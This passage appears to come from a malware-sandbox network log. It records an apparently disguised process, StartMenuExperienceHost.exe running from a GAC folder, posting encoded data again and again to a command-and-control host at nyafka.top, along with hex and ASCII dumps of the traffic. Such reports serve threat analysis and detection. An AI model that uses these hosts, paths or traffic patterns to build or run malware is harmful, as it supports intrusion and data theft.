                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ldvum%2BOIOFZ7Q%2FAALbxeGxHJIfsRFoFzzl18UoQwhpjq47mUoHS%2BJvR7prW9HX5dtNt%2FDuw2WzKCP0b3487JCRzJXtMled4jYzHMQl19%2BGFggUgLgH16fExlaDYpM5wVEP5Ayb9s"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a704f9c78c35d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 59 29 17 26 1d 23 3e 34 01 38 22 20 10 29 04 32 5e 3c 31 0a 02 25 1a 37 5c 2d 12 26 0b 35 05 2b 00 3e 12 36 59 30 12 24 00 3c 31 2a 51 03 1b 3a 03 3f 0d 33 1c 29 32 03 5d 3c 0b 39 58 26 20 29 44 3e 3e 21 55 27 2e 3a 5e 21 1f 20 57 3d 3c 3b 1d 2f 02 34 1d 3e 38 3d 01 37 3b 2a 5f 08 13 39 55 29 06 28 1e 36 09 39 58 35 5b 28 0d 35 2a 36 1b 2a 29 0c 1e 25 23 3c 5d 2c 0c 20 5b 23 01 23 56 35 02 04 1d 23 3e 20 5d 32 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'Y)&#>48" )2^<1%7\-&5+>6Y0$<1*Q:?3)2]<9X& )D>>!U'.:^! W=<;/4>8=7;*_9U)(69X5[(5*6*)%#<], [##V5#> ]2("_")Q?TR0
                                                                Oct 11, 2024 01:37:31.160406113 CEST346OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----MaiWBDBPLNTRdmLSbdcx8tEUy7faLjamVj
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 3182
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:31.256540060 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:31.256809950 CEST3182OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 61 69 57 42 44 42 50 4c 4e 54 52 64 6d 4c 53 62 64 63 78 38 74 45 55 79 37 66 61 4c 6a 61 6d 56 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                Data Ascii: ------MaiWBDBPLNTRdmLSbdcx8tEUy7faLjamVjContent-Disposition: form-data; name="0"Content-Type: text/plainP]XXQ[XR^ZUXQ]ZRWPXYUVQ^XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^P
                                                                Oct 11, 2024 01:37:31.716445923 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kUbo2Iz9Z1MuEWt8j%2FSEvlQaOnj6UiLAgBeMK7udVB%2FStk0BkncVedpNU1XUn5dDTgzz03RzJOcqZEU0G1lbJmlC9N4sbagBF6UtDuz9U41arswptxMvK18GziA1Ne7P9NNNng%2B0"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70520e6bc35d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:31.717614889 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:31.812364101 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:31.833372116 CEST1984OUTData Raw: 55 59 5d 5a 51 5f 58 54 5e 5a 55 58 51 52 5a 5f 57 5f 58 5d 55 5c 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UY]ZQ_XT^ZUXQRZ_W_X]U\QYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9](-4\(U&<E(+!+<?!W#$+&=U(87 "?>#Y$/\*
                                                                Oct 11, 2024 01:37:32.130439997 CEST750INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:32 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uGfRzAP%2FdPqHyvV2iLBA%2F4%2BPWbXeRkytt9hBG9m9qvE%2B2tpIcLctwDNyNpX6HBVlMq3lkf%2Bt75z7sNcD7zGW5qQ4Y4qK%2BJGBFaCC7RKsivJk5E2pDxmPBPekehJxJC9NVG5smFlZ"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70558926c35d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5c 3d 29 31 0e 34 3e 30 04 2c 1f 30 12 2b 3d 31 00 2b 08 38 07 25 0a 20 05 2d 12 08 0b 36 2b 3f 06 2a 3f 36 1c 24 05 2f 5d 28 0b 2a 51 03 1b 39 13 3e 23 06 0c 2b 0c 25 5f 2b 32 3a 06 33 23 17 06 3e 04 2e 0f 24 2e 07 06 22 08 38 56 2a 5a 23 53 3b 05 01 07 29 06 08 1e 23 01 2a 5f 08 13 39 1d 3e 01 3c 1d 35 27 2e 00 22 04 3b 52 22 07 04 52 3e 5f 21 0c 24 1d 38 5e 38 22 3c 12 34 06 3f 13 22 2c 04 57 23 2d 02 5b 25 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'\=)14>0,0+=1+8% -6+?*?6$/](*Q9>#+%_+2:3#>.$."8V*Z#S;)#*_9><5'.";R"R>_!$8^8"<4?",W#-[%("_")Q?TR0
                                                                Oct 11, 2024 01:37:32.238149881 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:32.332626104 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:32.332881927 CEST1984OUTData Raw: 50 58 5d 5c 51 5c 58 54 5e 5a 55 58 51 57 5a 52 57 5c 58 5b 55 51 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PX]\Q\XT^ZUXQWZRW\X[UQQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9_([(]??1'?&?!;/<. $7S&==S>^<6([(;#Y$/\*)
                                                                Oct 11, 2024 01:37:32.633033991 CEST748INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:32 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mVmhymuFnZYUJaOET3Fciw2BeSd6kFr2QnVm5%2B7KdYy2OJv7Mta5W2Aqs%2FfhdJAVRgj1Zj6lCRBgbKdlTgt36BuUcetDI%2FFZJa%2FpjxUteD%2Fezoak4NHbYh5XqThRenwg8695kulA"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7058cc2ac35d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 06 3e 07 3e 56 34 10 37 1f 2c 0f 01 07 29 2d 32 1b 28 0f 34 07 32 0a 3b 5e 39 02 36 0f 22 3b 0d 04 29 05 22 12 33 2c 37 11 2b 1b 2a 51 03 1b 39 11 3f 33 2c 0c 3f 1c 26 06 2b 1c 0b 5e 24 23 13 43 3e 2e 3e 08 33 10 29 07 23 31 34 56 3d 02 3c 0c 2f 02 37 43 2a 28 07 01 20 11 2a 5f 08 13 39 54 3e 38 38 51 21 27 00 05 36 2d 11 1f 21 5f 3a 56 3e 07 32 54 24 23 2c 5c 2f 31 24 5f 34 3c 2b 1e 22 2c 36 1f 20 2d 01 02 32 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$>>V47,)-2(42;^96";)"3,7+*Q9?3,?&+^$#C>.>3)#14V=</7C*( *_9T>88Q!'6-!_:V>2T$#,\/1$_4<+",6 -28"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                92192.168.2.550073188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:29.291212082 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:29.644129992 CEST2584OUTData Raw: 50 5e 5d 58 54 5e 58 5e 5e 5a 55 58 51 51 5a 5f 57 5a 58 5b 55 5d 51 5c 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P^]XT^X^^ZUXQQZ_WZX[U]Q\XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<=(Z+T&-?+5(X!(#Y(U)7 &>.)('"1,Z>#Y$/\*1
                                                                Oct 11, 2024 01:37:29.752089977 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:30.007123947 CEST597INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:29 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ssrM3CL30UPlqAZxhwttS4gi%2Fpp5tpnokCr5%2BTCnQ40e4XEYp361r0vtnpXSzZTP2nS5Y7VFuFu34miGR20Nbhw0jPF4iBOUQUXr5P5KRpa0Tg%2F4Y3O%2BmwJpH9ZD9y1HsG55YX6"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7048af067291-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                93192.168.2.550074188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:30.128737926 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:30.488020897 CEST2584OUTData Raw: 50 53 5d 5b 54 58 58 51 5e 5a 55 58 51 57 5a 59 57 5f 58 5b 55 5d 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PS][TXXQ^ZUXQWZYW_X[U]QYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<>0Z(:/V&X;+5?"8()W#B40-T*+5>#Y$/\*)
                                                                Oct 11, 2024 01:37:30.582463026 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:30.786979914 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:30 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1DKBzP1zY6oJ4an4RmNRqUtNRSQBJlKTvh9rnHVepIsHJSYjYxVMpAr%2BD7y5rrGaK9sDm5osO%2BfhmYhpBjouL85QmzOFTMjj335PUXJk3AqViegpdKKpvFUk%2FHZWJ55YP0mckoJC"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a704ddc280fa5-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                94192.168.2.550075188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:30.911083937 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:31.268971920 CEST2584OUTData Raw: 55 59 5d 55 51 58 58 57 5e 5a 55 58 51 56 5a 5f 57 50 58 5e 55 55 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UY]UQXXW^ZUXQVZ_WPX^UUQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9(./<);1+&0_6(/<5V7$;P3>.);; 2<Y>#Y$/\*-
                                                                Oct 11, 2024 01:37:31.362957954 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:31.716502905 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5y16FufO3KthWMkKuYQEKd%2BWwo7IYdCSn9WD7SrDmnmY9JKfWPRxDx%2B2oxF82ve04IGy8ekE0SAq8sD1cY4PeO9o1X3FJ2JKjUfoxMqiWtl%2BaPxj87W7gEVlqNm6BoC6CgbAdk3u"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7052bd154244-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:31.746220112 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5y16FufO3KthWMkKuYQEKd%2BWwo7IYdCSn9WD7SrDmnmY9JKfWPRxDx%2B2oxF82ve04IGy8ekE0SAq8sD1cY4PeO9o1X3FJ2JKjUfoxMqiWtl%2BaPxj87W7gEVlqNm6BoC6CgbAdk3u"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7052bd154244-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                95192.168.2.550076188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:31.957541943 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:32.316109896 CEST2584OUTData Raw: 50 53 5d 5f 54 5d 58 52 5e 5a 55 58 51 5c 5a 52 57 5b 58 5b 55 55 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PS]_T]XR^ZUXQ\ZRW[X[UUQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9^(-7<9/W&.,@?6 #;3(U9S4743=V>^'""?)#Y$/\*
                                                                Oct 11, 2024 01:37:32.407094955 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:32.577037096 CEST597INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:32 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yh5nYARg2wiAwI6Z6KNr945KGNiP8CHxtwqgQ7vzeuGfKwCHr4codSz4Hc1%2F3abQb7CYNEhs%2BrtPNsgeeTUA0wdsJPaexzPoXdX67LXEQHZ%2BY%2FJ5JYK7efjwnPSe06E6LPbsY0OB"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70593a828c81-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                96192.168.2.550077188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:32.707078934 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:33.065849066 CEST2584OUTData Raw: 55 5a 5d 54 51 5c 5d 51 5e 5a 55 58 51 54 5a 53 57 5b 58 5a 55 57 51 58 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UZ]TQ\]Q^ZUXQTZSW[XZUWQXXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<-7??U%0<%\"+/(>#4'W'.9*(F"!?);#Y$/\*%
                                                                Oct 11, 2024 01:37:33.173094988 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:33.342284918 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:33 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m4jXhIA9kVHTgqSfwiJmtRDhkEYarWKTpi%2FfPHjgfUyF%2B8qpOtr4O2f7qaYbYlu9jaALQF4WOzNIC12Rp5kj1unAz%2F2nDqKngdCgRiZwBqDd%2B0G02oSvnsWQDvezVxzgz%2Bw27onf"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a705e0e308c8d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                97192.168.2.550078188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:32.743936062 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:37:33.097033978 CEST1984OUTData Raw: 55 59 5d 5c 54 54 58 51 5e 5a 55 58 51 57 5a 59 57 58 58 5e 55 53 51 5e 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UY]\TTXQ^ZUXQWZYWXX^USQ^XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:?<Y>)'W%>/<%_";#+057$ $)S>8""'=+#Y$/\*)
                                                                Oct 11, 2024 01:37:33.208034039 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:33.449919939 CEST748INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:33 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kIi1x%2FG6oeU%2B80u%2Fz6YtpJRzm0yCoGsfsnfn0%2BWW8Npw7ThQNR7VPajsKhuMH59awar2fAtNqN4GDPVDInC4GJ4ZSfdYpT4EZ1YFWInyu5MCqHkDH4I%2FxZ5yaH54gdrKvfqy9PHf"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a705e3ab63300-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 06 29 3a 39 0b 20 3e 30 05 3b 31 01 00 2b 2d 39 04 28 21 2b 10 25 42 37 58 39 3c 2a 0d 21 05 28 58 29 12 0c 1c 26 3f 2c 00 29 31 2a 51 03 1b 39 5a 3f 0d 2b 1d 3c 22 25 5b 3c 21 3d 14 27 33 35 42 29 13 0f 51 25 3e 2d 06 22 31 3b 0b 28 2f 2f 55 2c 05 23 45 3d 2b 21 03 37 3b 2a 5f 08 13 3a 0f 28 28 3c 51 36 0e 3d 58 23 3e 23 1d 22 29 2d 0f 29 39 07 08 25 20 3b 01 3b 0c 3c 1d 23 2f 23 50 21 12 29 0c 20 2d 09 03 32 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$):9 >0;1+-9(!+%B7X9<*!(X)&?,)1*Q9Z?+<"%[<!='35B)Q%>-"1;(//U,#E=+!7;*_:((<Q6=X#>#")-)9% ;;<#/#P!) -2"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                98192.168.2.550079188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:33.473752022 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
